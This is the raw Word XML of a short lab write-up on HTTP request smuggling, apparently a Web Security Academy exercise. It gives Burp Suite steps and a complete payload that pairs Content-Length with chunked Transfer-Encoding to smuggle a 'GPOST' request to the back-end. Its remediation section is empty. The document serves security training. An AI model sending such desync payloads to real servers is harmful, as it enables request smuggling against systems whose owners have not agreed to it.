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E377E" w14:textId="456CB598" w:rsidR="00320924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SCENARIO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E100013" w14:textId="37A102A6" w:rsidR="0038190F" w:rsidRPr="00DB03A9" w:rsidRDefault="001C116F" w:rsidP="001C116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This application </w:t>
      </w:r>
      <w:r w:rsidR="000E1F7D" w:rsidRPr="000E1F7D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>involves a front-end and back-end server, and the back-end server doesn't support chunked encoding. The front-end server rejects requests that aren't using the GET or POST method</w:t>
      </w:r>
      <w:r w:rsidRPr="001C116F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"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We will try to </w:t>
      </w:r>
      <w:r w:rsidRPr="001C116F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>smuggle a request to the back-end server, so that the next request processed by the back-end server appears to use the method GPOST</w:t>
      </w:r>
      <w:r w:rsidR="00184A3E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1B581D0C" w14:textId="77777777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1C86A0C" w14:textId="3E6ADA0C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PROCEDURE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2868DC9D" w14:textId="137323AC" w:rsidR="0038190F" w:rsidRDefault="00D9364E" w:rsidP="00014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Open the web application and send the GET request </w:t>
      </w:r>
      <w:r w:rsidR="007B0901">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">for homepage </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to BurpSuite’s Repeater.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137E6699" w14:textId="46F679BC" w:rsidR="007B0901" w:rsidRDefault="007B0901" w:rsidP="00014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Now right click on the request and click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Change Request Method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to change the request to </w:t>
      </w:r>
      <w:r w:rsidRPr="007B0901">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>POST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as we can not send body for </w:t>
      </w:r>
      <w:r w:rsidRPr="007B0901">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GET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requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048EB7A2" w14:textId="40312B9C" w:rsidR="00DC5264" w:rsidRPr="000141D4" w:rsidRDefault="00355D0A" w:rsidP="00014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Inject the payload in the Repeater tab and send the request twice</w:t>
      </w:r>
      <w:r w:rsidR="00C15196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22D3E82D" w14:textId="77777777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7861B7F" w14:textId="75099CD9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PAYLOAD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FA64F8" w14:textId="77777777" w:rsidR="0022477F" w:rsidRPr="0022477F" w:rsidRDefault="0022477F" w:rsidP="0022477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2477F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>POST / HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F007EAC" w14:textId="77777777" w:rsidR="0022477F" w:rsidRPr="0022477F" w:rsidRDefault="0022477F" w:rsidP="0022477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2477F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Host: 0ad400270476fb1b8151c55c00b600c5.web-security-academy.net</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41085AA3" w14:textId="77777777" w:rsidR="0022477F" w:rsidRPr="0022477F" w:rsidRDefault="0022477F" w:rsidP="0022477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2477F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Content-Type: application/x-www-form-urlencoded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7889E3FF" w14:textId="77777777" w:rsidR="0022477F" w:rsidRPr="0022477F" w:rsidRDefault="0022477F" w:rsidP="0022477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2477F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Content-Length: 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFCA419" w14:textId="77777777" w:rsidR="0022477F" w:rsidRPr="0022477F" w:rsidRDefault="0022477F" w:rsidP="0022477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2477F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Transfer-Encoding: chunked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633033AA" w14:textId="77777777" w:rsidR="0022477F" w:rsidRPr="0022477F" w:rsidRDefault="0022477F" w:rsidP="0022477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B3ADFC4" w14:textId="77777777" w:rsidR="0022477F" w:rsidRPr="0022477F" w:rsidRDefault="0022477F" w:rsidP="0022477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2477F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>5c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA74855" w14:textId="77777777" w:rsidR="0022477F" w:rsidRPr="0022477F" w:rsidRDefault="0022477F" w:rsidP="0022477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2477F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GPOST / HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288EAE76" w14:textId="77777777" w:rsidR="0022477F" w:rsidRPr="0022477F" w:rsidRDefault="0022477F" w:rsidP="0022477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2477F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Content-Type: application/x-www-form-urlencoded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C7A695" w14:textId="77777777" w:rsidR="0022477F" w:rsidRPr="0022477F" w:rsidRDefault="0022477F" w:rsidP="0022477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2477F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Content-Length: 15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4E6111" w14:textId="77777777" w:rsidR="0022477F" w:rsidRPr="0022477F" w:rsidRDefault="0022477F" w:rsidP="0022477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BEEB932" w14:textId="77777777" w:rsidR="0022477F" w:rsidRPr="0022477F" w:rsidRDefault="0022477F" w:rsidP="0022477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2477F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00437BEC" w14:textId="77777777" w:rsidR="0022477F" w:rsidRDefault="0022477F" w:rsidP="0022477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2477F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C00B096" w14:textId="77777777" w:rsidR="0022477F" w:rsidRDefault="0022477F" w:rsidP="0022477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8BDEA8D" w14:textId="77777777" w:rsidR="0022477F" w:rsidRPr="0022477F" w:rsidRDefault="0022477F" w:rsidP="0022477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F7151E6" w14:textId="77777777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BFD9913" w14:textId="4D0A110D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REMEDIATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED22CEF" w14:textId="77777777" w:rsidR="0027128C" w:rsidRPr="0038190F" w:rsidRDefault="0027128C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sectPr w:rsidR="0027128C" w:rsidRPr="0038190F" w:rsidSect="00DC1F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13BE4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A0208C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2151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981"/>
    <w:rsid w:val="000141D4"/>
    <w:rsid w:val="000C7F21"/>
    <w:rsid w:val="000E1F7D"/>
    <w:rsid w:val="00136E28"/>
    <w:rsid w:val="00184A3E"/>
    <w:rsid w:val="001C116F"/>
    <w:rsid w:val="0022477F"/>
    <w:rsid w:val="0027128C"/>
    <w:rsid w:val="00320924"/>
    <w:rsid w:val="00355D0A"/>
    <w:rsid w:val="0038190F"/>
    <w:rsid w:val="00412AC9"/>
    <w:rsid w:val="00434981"/>
    <w:rsid w:val="00684634"/>
    <w:rsid w:val="007B0901"/>
    <w:rsid w:val="009861D0"/>
    <w:rsid w:val="00A10746"/>
    <w:rsid w:val="00C15196"/>
    <w:rsid w:val="00D9364E"/>
    <w:rsid w:val="00DB03A9"/>
    <w:rsid w:val="00DC1F12"/>
    <w:rsid w:val="00DC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84E82"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E8B08E09-ACCF-4FD8-AD77-E205D1E3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5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9</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-10-04T07:25:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-04T07:27:00Z</dcterms:modified>
</cp:coreProperties>
</file>